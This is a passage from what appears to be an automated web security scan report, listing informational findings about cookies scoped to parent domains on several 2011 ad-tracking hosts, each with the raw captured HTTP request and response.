lyc=BAAAAARD0s9NACAAAFlgBYAABIsyAABJoBcBFEyAE0AABmNWAACRgNBgKQEfTkARgAAB5jOAB2AAAFBgBWAAA+o2AAA=; domain=.fastclick.net; path=/; expires=Wed, 15-May-2013 01:40:52 GMT
pluto=660455823372; domain=.fastclick.net; path=/; expires=Wed, 15-May-2013 01:40:52 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /w/tre?ad_id=20480;evt=12869;cat1=14057;cat2=14058 HTTP/1.1
Host: media.fastclick.net
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2079557;type=count386;cat=homef166;ord=1;num=9459547300357.371?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pluto2=660455823372; lyc=AwAAAARD0s9NACAAAFlgBYAABIsyAABJoBcBFEyAE0AAAWNWQAWAAAEfToAHQAAD5jMAAA==; pluto=660455823372

Response

HTTP/1.1 302 Redirect
Date: Mon, 16 May 2011 01:40:52 GMT
Location: http://www.googleadservices.com/pagead/conversion/1032669722/?label=xY9oCKaH0wEQmpS17AM&guid=ON&script=0
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Type: text/plain
Content-Length: 0
Set-Cookie: lyc=BAAAAARD0s9NACAAAFlgBYAABIsyAABJoBcBFEyAE0AABmNWAACRgNBgKQEfTkARgAAB5jOAB2AAAFBgBWAAA+o2AAA=; domain=.fastclick.net; path=/; expires=Wed, 15-May-2013 01:40:52 GMT
Set-Cookie: pluto=660455823372; domain=.fastclick.net; path=/; expires=Wed, 15-May-2013 01:40:52 GMT

15.46. http://odb.outbrain.com/utils/get previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://odb.outbrain.com
Path:	/utils/get

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

obuid=8212382c-a920-4555-8b81-259021933018; Domain=.outbrain.com; Expires=Thu, 10-May-2012 01:20:01 GMT; Path=/
tick=1305508801726; Domain=.outbrain.com; Path=/
_lvs2="uaMqgoSgWEtsUDbY+ohiLdTBMiCQRzqSyDZn+kvSOpk="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Mon, 11-Jun-2012 01:20:01 GMT; Path=/
_lvd2="e0MjrHqXH8wCQxDytJnB4N69GWfDw5tMPzeXAm/v95E+Pd3eRDQ31LtR9rpG/iasrRB7gaZuTZkaOZp2Wa/Mig=="; Version=1; Domain=outbrain.com; Max-Age=564480; Expires=Sun, 22-May-2011 14:08:01 GMT; Path=/
_rcc2=NXlRX9sMiunRtm+CPv1EhOsE3s6itk45; Domain=outbrain.com; Expires=Mon, 11-Jun-2012 01:20:01 GMT; Path=/
recs-d05ceaa5e98919d54bf25e1e7852b87a="C8l7XAqvsWXXoYiuQVgi+fUpe6TWk1Kf7lTKiLbsbR6vpF6c0L+pYTIIxYz9qEDsFRTizFCiaiU="; Version=1; Domain=outbrain.com; Max-Age=300; Expires=Mon, 16-May-2011 01:25:01 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /utils/get?url=http%3A%2F%2Ftravel.usatoday.com%2Fcruises%2Fpost%2F2011%2F05%2Fdisney-cruise-line-dream-fantasy-wonder-ship-bookings%2F169725%2F1&srcUrl=http%3A%2F%2Frssfeeds.usatoday.com%2FUsatodaycomTravel-TopStories&settings=true&recs=true&widgetJSId=NA&key=AYQHSUWJ8576&idx=0&version=37803&ref=&apv=false&rand=0.2819366557523608&sig=01J067gF HTTP/1.1
Host: odb.outbrain.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _lvs2="uaMqgoSgWEtsUDbY+ohiLYEnd3D/JQAT"; _lvd2="e0MjrHqXH8wCQxDytJnB4N69GWfDw5tMPzeXAm/v95E+Pd3eRDQ31LtR9rpG/iaskJWlQEP7SN0="; _rcc2=NXlRX9sMiunRtm+CPv1EhOsE3s6itk45; obuid=8212382c-a920-4555-8b81-259021933018

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: obuid=8212382c-a920-4555-8b81-259021933018; Domain=.outbrain.com; Expires=Thu, 10-May-2012 01:20:01 GMT; Path=/
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: tick=1305508801726; Domain=.outbrain.com; Path=/
P3P: policyref="http://www.outbrain.com/w3c/p3p.xml",CP="NOI NID CURa DEVa TAIa PSAa PSDa OUR IND UNI"
Set-Cookie: _lvs2="uaMqgoSgWEtsUDbY+ohiLdTBMiCQRzqSyDZn+kvSOpk="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Mon, 11-Jun-2012 01:20:01 GMT; Path=/
Set-Cookie: _lvd2="e0MjrHqXH8wCQxDytJnB4N69GWfDw5tMPzeXAm/v95E+Pd3eRDQ31LtR9rpG/iasrRB7gaZuTZkaOZp2Wa/Mig=="; Version=1; Domain=outbrain.com; Max-Age=564480; Expires=Sun, 22-May-2011 14:08:01 GMT; Path=/
Set-Cookie: _rcc2=NXlRX9sMiunRtm+CPv1EhOsE3s6itk45; Domain=outbrain.com; Expires=Mon, 11-Jun-2012 01:20:01 GMT; Path=/
Set-Cookie: recs-d05ceaa5e98919d54bf25e1e7852b87a="C8l7XAqvsWXXoYiuQVgi+fUpe6TWk1Kf7lTKiLbsbR6vpF6c0L+pYTIIxYz9qEDsFRTizFCiaiU="; Version=1; Domain=outbrain.com; Max-Age=300; Expires=Mon, 16-May-2011 01:25:01 GMT; Path=/
Content-Type: text/x-json;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 16 May 2011 01:20:01 GMT
Content-Length: 5695

outbrain_rater.returnedOdbData({'response':{'exec_time':11,'status':{'id':0,'content':'Request succeeded'},'request':{'did':'204743393','req_id':'2c212fed2ea6ae828b68521a5c2a57e6'},'score':{'preferred
...[SNIP]...

15.47. http://odb.outbrain.com/utils/ping.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://odb.outbrain.com
Path:	/utils/ping.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

obuid=8212382c-a920-4555-8b81-259021933018; Domain=.outbrain.com; Expires=Thu, 10-May-2012 01:19:52 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /utils/ping.html?random=0.6820258141960949 HTTP/1.1
Host: odb.outbrain.com
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: obuid=8212382c-a920-4555-8b81-259021933018; _lvs2="uaMqgoSgWEtsUDbY+ohiLYEnd3D/JQAT"; _lvd2="e0MjrHqXH8wCQxDytJnB4N69GWfDw5tMPzeXAm/v95E+Pd3eRDQ31LtR9rpG/iaskJWlQEP7SN0="; _rcc2=NXlRX9sMiunRtm+CPv1EhOsE3s6itk45

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: obuid=8212382c-a920-4555-8b81-259021933018; Domain=.outbrain.com; Expires=Thu, 10-May-2012 01:19:52 GMT; Path=/
Cache-Control: no-cache
Pragma: no-cache
Accept-Ranges: bytes
ETag: W/"158-1304265382000"
Last-Modified: Sun, 01 May 2011 15:56:22 GMT
Content-Type: text/html
Content-Length: 158
Date: Mon, 16 May 2011 01:19:52 GMT

<html>
   <head>
       <META HTTP-EQUIV="Cache-Control" CONTENT="no-cache">
       <META HTTP-EQUIV="Pragma" CONTENT="no-cache">
   </head>
   <body>
   </body>
</html>

15.48. http://optimized-by.rubiconproject.com/a/dk.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/dk.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rdk=4462/5032; expires=Mon, 16-May-2011 02:21:49 GMT; max-age=60; path=/; domain=.rubiconproject.com
ses2=5032^1; expires=Tue, 17-May-2011 04:59:59 GMT; max-age=110290; path=/; domain=.rubiconproject.com
csi2=3179363.js^2^1305508799^1305508909&3158416.js^1^1305508790^1305508790; expires=Mon, 23-May-2011 01:21:49 GMT; max-age=604800; path=/; domain=.rubiconproject.com;

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/dk.js?defaulting_ad=x303190.js&size_id=2&account_id=4462&site_id=5032&size=728x90 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2146=xn7ja41kw4np53teeikidoecxeh9fu6s; ruid=154dd07bb6adc1d6f31bfa10^1^1305508790^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rdk=4462/5032; rdk2=0; ses2=5032^1; csi2=3158416.js^1^1305508790^1305508790; rpb=5671%3D1; put_2081=AG-00000001389358554

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:21:49 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=4462/5032; expires=Mon, 16-May-2011 02:21:49 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=2; expires=Mon, 16-May-2011 02:21:49 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=5032^1; expires=Tue, 17-May-2011 04:59:59 GMT; max-age=110290; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3179363.js^2^1305508799^1305508909&3158416.js^1^1305508790^1305508790; expires=Mon, 23-May-2011 01:21:49 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 1279

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3179363"
...[SNIP]...

15.49. http://p.brilig.com/contact/bct previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://p.brilig.com
Path:	/contact/bct

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

BriligContact=98af0ff8-2b65-4314-a162-44d6c9442b5e; Domain=.brilig.com; Expires=Wed, 08-May-2041 01:24:05 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /contact/bct?pid=21008FFD-5920-49E9-AC20-F85A35BDDE15&_ct=pixel&puid=d96a784e-8901-47de-9dd1-4f91acb31514&REDIR=http://tag.admeld.com/pixel?admeld_dataprovider_id=27&external_user_id=1&_m=1&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_dataprovider_id=27&admeld_callback=http://tag.admeld.com/pixel HTTP/1.1
Host: p.brilig.com
Proxy-Connection: keep-alive
Referer: http://www.telegraph.co.uk/sponsored/travel/disney/8509938/Disney-Cruise-Line-A-world-of-entertainment.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache,no-store,must-revalidate,post-check=0,pre-check=0
Content-Type: text/plain
Date: Mon, 16 May 2011 01:24:05 GMT
Expires: Mon, 19 Dec 1983 01:24:05 GMT
Location: http://tag.admeld.com/pixel?admeld_dataprovider_id=27&external_user_id=1&_m=1&admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_dataprovider_id=27&admeld_callback=http://tag.admeld.com/pixel
P3P: CP="NOI DSP COR CURo DEVo TAIo PSAo PSDo OUR BUS UNI COM"
Pragma: no-cache
Server: Apache/2.2.16 (Ubuntu)
Set-Cookie: BriligContact=98af0ff8-2b65-4314-a162-44d6c9442b5e; Domain=.brilig.com; Expires=Wed, 08-May-2041 01:24:05 GMT
X-Brilig-D: D=2965
Content-Length: 0
Connection: keep-alive

15.50. http://pix04.revsci.net/D08734/a1/0/0/0.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/D08734/a1/0/0/0.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPNe0PF7gMQFmJWbyWFI8KcVrpFPspBkQQl039IaIgg8jZQUo0NbqPPGqKijctoWezVxn8NETHRFNNSzdtFRTUCxWfOKMPVZklOsdH4xajO0s37Wwz/7kTD5ULyoHR4m1zbPl+patzVgK0FRKgg8HIekkYS5L2I9ZH9bQpQfBRVPCosmpYT5EbkzhtnV4qjes0+4V4NQlyRHu8HPhpHXMFc; Domain=.revsci.net; Expires=Tue, 15-May-2012 01:27:06 GMT; Path=/
udm_0=MLv39S8JaSpnph4dB7K/G387JUZpTEF7bBfSBcrl4GZ0DuhdE65A9sjL/vODgau+0ez8vR6ZC1nYzPH4IuuN87FZ4WADz+pq1jvL/iNwgLtlNdjleIfLlz0uEZFfSGaEiK+yWYqPAI3xPY1uWQyCA8HO5oBfT30Lca4W4Lz2IcT5Ryk7tW3MU7q3BYih9BMfkZY/6UittEWmFvtHcssd3m0LRFbH8mcpL9RBMBDplDbavE/sv9kJnudEbZhTcq91aPAMhFt54xJUPjTnF6k0MOyiFr1ibikt83cQalIquHcItkkZ5aCAHnuetAGRPOpgO76UnAD0S659WopGn066WHpk72h7oMq6AmWpMR3z5qwEhj9T6nXRtA1SggSqhXq0gcMamUPHFisp0pbeG/HXU1HQkKw1yo+TiKXn8QcttAzFcz0uGjvk0uM7UBfJmj4bfKTmussOlg8u95mG8LCWRDXtStrhxeDzv2KFF32aZldKfGhJCxN7lCO4bEYK1/WL9pUxuhZip7o1iAS+chtkBps0ZaVPltSIb+WsuId9aj4ahoRj/kNu8kK6R6rkP0NjpXPOO2D5DAy9LhB7aLirkhyc2NspTH4HY6aEVE+KJ3hlC+XlM60txn5QP314Jiimpn/JHqxtXWUZiKCwjmqReXsBDQFqtIQgp3vWy7kwENCeIqKB5SuKChT9O60e1D4UUUO6GhWolLOLniWBD9Gb3WtSjLqSOeC4tQIXZvg81T5OTy/a2g2Drr5acyHI4DKMA5+mA6OGxf3ugpnfInlTfnjM1hkxxnoY3Nfv+Q4aDPx3nYu6BeGbbs2HkwxRBXMp7GmTgNvJyptECIq8O1q97TBoBG3y2QzlmVCsTrlIJTpK1ajlMl9bCQJMDH4OW3M8ASzAwFB5zlxhQacEAQaunpkAFBuJHWJPmCRFVL4POVoOERKGu6Wwj92IvL4uFcfCp7CAkVDhcgQUu5vHyQOeQAYatElgayLnMXY7hsfZOHg4DNpo1/Lu4w==; Domain=.revsci.net; Expires=Tue, 15-May-2012 01:27:06 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /D08734/a1/0/0/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Fgoogle.com%252F0.gif%253Fid%253DCAESENrwGpiUbhitM9fS6DyZedo&cver=1 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://travel.usatoday.com/cruises/post/2011/05/disney-cruise-line-dream-fantasy-wonder-ship-bookings/169725/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_G07608=82f4957c1a652091&G07608&0&4df33ff4&0&&4dcde361&1f1a384c105a2f365a2b2d6af5f27c36; rsiPus_IH_7="MLtXrF9vsF9nIDEzefq6vpEshYFGjdlQKkw4AX9R6TH/LRnRcudMd6UdHTVGVIPJjz/yF34dHT25tVh790Up6NBJPV43sAoYRKLv7Za4Rwx2/OuBlUO+TFiqzoc98k+cpjMMg5USvXrBeFN3oCTNygkzLwCEpbHvTO1DFmYTno4bvhgTyCVUCll7KXXgfUAI0Py2fGh6MPSOt7ObjB3woINiVApH0A=="; rsi_us_1000000="pUMdJc+g/xMU1j3Eq6mR0x2J+T7uFxaPzsVdi8Ni1rYm6J68l6acsXsd9OYJYVlly8cr+J2K6AddxvkNjEpT8X3w4B4lBCjXwQIbR0jlRnTHgpk5f1sQGfmFmyVEtx+gxjLU3wnYgttSfhxMbzfydi3AAGoKvCmxF7TxORX1mqADXOanLZaz6sJGSEz90RB0KeOifwnURRHhCsVk3w6bNETq9nc+k2ll9KMbb8sWgiVgH2Zd335WJFX18Hy2/BgZNsf9NM8irA1uZi6UJW+DKzXg+99MdH2//xFgX+ZPOQDsoy9Be8AFAdjuskLYUDxsUlNhyqQaWwGvJyuAuf0Ss2l0uH6jvt4FcFbTkZBk9q7caxdxw2TJZQfbfDKhb2bpjeGdZoqJ44fCKH3DoxpfXBIW3ohUSVLFElW2dztek4Fn2fadkI5nP/Lat0PGhonkfKaiqyqMWT6PSUH0tnXPvFFCQ2Evk4Yarbh4YiTvgdw/8E5sj9TdpiToNMPKRMu250cwirAHBwhZoo9S04egkJIm5Tk0Su5s9KFZoDc41rkgS7pZnikG/LfPzPlgEjldlohervfYVZ/LaMjmJuZfR6SZUqtPVd8O7nMqgFt6bf4Md0jAFU3IbNqPuCHHS/cEp3nCnspLAR4e1R+gGitqEYVA+JOiq4sp+fRtOiU1jtoQ4FRVaJP/03I9PtH0VkJpFhL7CuayYoDhdKu0ByWZy+KTL1v/OQpmY1nftZfGOHQjKSF2P1zTGfEpRqL2kw=="; rsi_segs_1000000=pUPNfcPG7hMUFmJSL/a6Tc2cVgtigl9iBC1EXVoovPAwnmKsOWQJ/ULPGqLC16G0T17iRicC5KARkwTsTN8ioePPguoJ741/DK1Cmzf3MeNCyP1GEAb//VXLu/54y0XW2Qc7M45GdUJiNdjHq/ZtHS6Ghn8KrCU4potT0MwJAi0TACPm038iu2F90zRFvW2tyQA=; rtc_ac8M=MLuBq44HAVpDE1RBdcKRB7ZxEIAJXzMpNIiX6/DkPUHnRwu1INU7YESuLkV5mBhoj5Zf1jVUOEA+YtTPI8JufG/Cre49XXYBRXzYUblcveQ2ugG0KGJ2zDaCaA59xBUJAUsWH2wHE3djRDcpNER26fldZTABDtd4uTBdzX9g62NQniwGxHVABktEbzdrInhjUjr8DeZHE2mPTEUo; NETSEGS_E06560=82f4957c1a652091&E06560&0&4df565ca&0&&4dcf65b3&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv39VEJbipn5t4pnpAaFXny/BhBCiFsbAsAnLzSYTlgg0qTOJ+Mg3DlTMEXAQTOD+7Yub7r0vZBjStqSHp0DWUhACTwZ3EiouT1cmm7wklDaOK/14Aj81c0EIOAjVSJNQ3/EJasmJU7rIdacNN0Suber3u8hlyARHsvpr0/LOSJS6bFYRSzZNKzSNQAzR12RlrciVdiZGvbIO0IrHQN6IZ5RFd0d+GqL8fZiTJZzaFjB+mKwrW9Wtwfhvi6ZzgvwXVFc+8JUgmysmlVasU4dDPRH48UbqWeyhogknLvpE7T0uymnntOnjnUXYFW/gUDr4tsrPjdAj+g49LnF7JczoY0qriSWVTmX/9B5mXyqikERRR7Wk7BtStxYE6DJh0PbDCcxaExS8LGEDu8qSMID8Jwyb+Wm4s0zH0JSE0XV2nhS+EsFzU0qn7qYVG23LOB5WEU5xepu5cA0xJ15e1tB8J0GRlXzkb1KB1wlRBGbef7TwTAltx9qrUQVr1AuDuQX3A2xbSkLeLGxARQdRtsBmY05cVPkBSIV+Ssvkd96r0ZhIBj/lNu8kK8QaokX0MDpeEz1F0u2r7Zz49jYSa3dq+PqSLFM1ySnu9PCyy02UBe92k9yjvyGFIH4lJT7rLmIikjqCRY7GUquZfOvqj/aBChSK1DHpMhLWCDF9rXnxOpnedFSOU6h5luF/mpBF2BtCkXKBeorKv7uk3WitFqzV0IC9C9BgWCUuGYfxFUgsaY2A6YyhSXKh7JqmH7Z2Twza28z3IU4s0pNAp8HN1BpbB/X82OpsvUtU9bmLPStjKw/l0cG+hCVLfXNEztRuMAXnSlSjgVHLN603CKv7wJcZ0a/VW8Og0VckJS3ggd3pkXtDl6sJAZyl8giiba1xEYmHGvdZOt4P5CUOc/cgqc3kEWkbycO4mTQjBUqxR65jDm+aIZ24qdnNdfSouAtwoNLfZUrmJJfoO04g2sewVltiFk6CJ9OrVqxL8g/cQ5sMLgAN9nx/vu1w==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPNe0PF7gMQFmJWbyWFI8KcVrpFPspBkQQl039IaIgg8jZQUo0NbqPPGqKijctoWezVxn8NETHRFNNSzdtFRTUCxWfOKMPVZklOsdH4xajO0s37Wwz/7kTD5ULyoHR4m1zbPl+patzVgK0FRKgg8HIekkYS5L2I9ZH9bQpQfBRVPCosmpYT5EbkzhtnV4qjes0+4V4NQlyRHu8HPhpHXMFc; Domain=.revsci.net; Expires=Tue, 15-May-2012 01:27:06 GMT; Path=/
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLv39S8JaSpnph4dB7K/G387JUZpTEF7bBfSBcrl4GZ0DuhdE65A9sjL/vODgau+0ez8vR6ZC1nYzPH4IuuN87FZ4WADz+pq1jvL/iNwgLtlNdjleIfLlz0uEZFfSGaEiK+yWYqPAI3xPY1uWQyCA8HO5oBfT30Lca4W4Lz2IcT5Ryk7tW3MU7q3BYih9BMfkZY/6UittEWmFvtHcssd3m0LRFbH8mcpL9RBMBDplDbavE/sv9kJnudEbZhTcq91aPAMhFt54xJUPjTnF6k0MOyiFr1ibikt83cQalIquHcItkkZ5aCAHnuetAGRPOpgO76UnAD0S659WopGn066WHpk72h7oMq6AmWpMR3z5qwEhj9T6nXRtA1SggSqhXq0gcMamUPHFisp0pbeG/HXU1HQkKw1yo+TiKXn8QcttAzFcz0uGjvk0uM7UBfJmj4bfKTmussOlg8u95mG8LCWRDXtStrhxeDzv2KFF32aZldKfGhJCxN7lCO4bEYK1/WL9pUxuhZip7o1iAS+chtkBps0ZaVPltSIb+WsuId9aj4ahoRj/kNu8kK6R6rkP0NjpXPOO2D5DAy9LhB7aLirkhyc2NspTH4HY6aEVE+KJ3hlC+XlM60txn5QP314Jiimpn/JHqxtXWUZiKCwjmqReXsBDQFqtIQgp3vWy7kwENCeIqKB5SuKChT9O60e1D4UUUO6GhWolLOLniWBD9Gb3WtSjLqSOeC4tQIXZvg81T5OTy/a2g2Drr5acyHI4DKMA5+mA6OGxf3ugpnfInlTfnjM1hkxxnoY3Nfv+Q4aDPx3nYu6BeGbbs2HkwxRBXMp7GmTgNvJyptECIq8O1q97TBoBG3y2QzlmVCsTrlIJTpK1ajlMl9bCQJMDH4OW3M8ASzAwFB5zlxhQacEAQaunpkAFBuJHWJPmCRFVL4POVoOERKGu6Wwj92IvL4uFcfCp7CAkVDhcgQUu5vHyQOeQAYatElgayLnMXY7hsfZOHg4DNpo1/Lu4w==; Domain=.revsci.net; Expires=Tue, 15-May-2012 01:27:06 GMT; Path=/
X-Proc-ms: 0
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: image/gif
Content-Length: 43
Date: Mon, 16 May 2011 01:27:05 GMT

GIF89a.............!.......,...........D..;

15.51. http://pix04.revsci.net/E06560/b3/0/3/0902121/179920729.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/E06560/b3/0/3/0902121/179920729.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPNfcPG7gMUFVJGSXAru+PspYp8Zh1vxU4kHQpvTJd5E38Uby8gAQtSL0j8UFK4h8IFpXuZrLSfteXArmPZg/O+tDYVt4DWBmlQuQeNBWHL0M3bZxr/7kbDaukbHXsevvyz0uHQn4wL4sXXo9zC07YrXswS3ctuzx/w1oQEEUBiG7Fkd+08Z0a0Aq8+neXrJjEYTyoXD7O/9BSRxw==; Domain=.revsci.net; Expires=Tue, 15-May-2012 01:24:04 GMT; Path=/
rtc_kCmS=MLsvrdMvcT5jJQFErn5VSDYGHlHr5G4IUDwGBCOQN50vl8AxTgkQ69k2sWbYhD5swupGFuttZZ30pjREZ/ZkKkhmVOC4XP9dHEpHAm3ADaku92HBduCPjDheEZyi3USKjMyJU8PKvSGf6dbgKbkkF1T9nPoTyICKBODL5dWNTWGJSo//SZoNqh0jXWrCVj5fE0hG1/Ew1855Q3kGOJISwLZwyFyrdDpPp9pEr5K7YRGtS1DhqDKb+B3xI4h5pUmK196H1VYARyez77DbY8fCN3YqmgkgAm74R4TtPLq8byYJ7dh3Jpzg7zgqcfYD+8HJFFf4m0VurVwRBH7s; Domain=.revsci.net; Expires=Tue, 15-May-2012 01:24:04 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /E06560/b3/0/3/0902121/179920729.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.telegraph.co.uk%252Fsponsored%252Ftravel%252Fdisney%252F8509938%252FDisney-Cruise-Line-A-world-of-entertainment.html%253FSite%253DTelegraph%2526Level1%253DSponsored%2526Level2%253DTravel%2526Level3%253DDisney%26DM_EOM%3D1&C=E06560 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.telegraph.co.uk/sponsored/travel/disney/8509938/Disney-Cruise-Line-A-world-of-entertainment.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_G07608=82f4957c1a652091&G07608&0&4df33ff4&0&&4dcde361&1f1a384c105a2f365a2b2d6af5f27c36; rsiPus_IH_7="MLtXrF9vsF9nIDEzefq6vpEshYFGjdlQKkw4AX9R6TH/LRnRcudMd6UdHTVGVIPJjz/yF34dHT25tVh790Up6NBJPV43sAoYRKLv7Za4Rwx2/OuBlUO+TFiqzoc98k+cpjMMg5USvXrBeFN3oCTNygkzLwCEpbHvTO1DFmYTno4bvhgTyCVUCll7KXXgfUAI0Py2fGh6MPSOt7ObjB3woINiVApH0A=="; 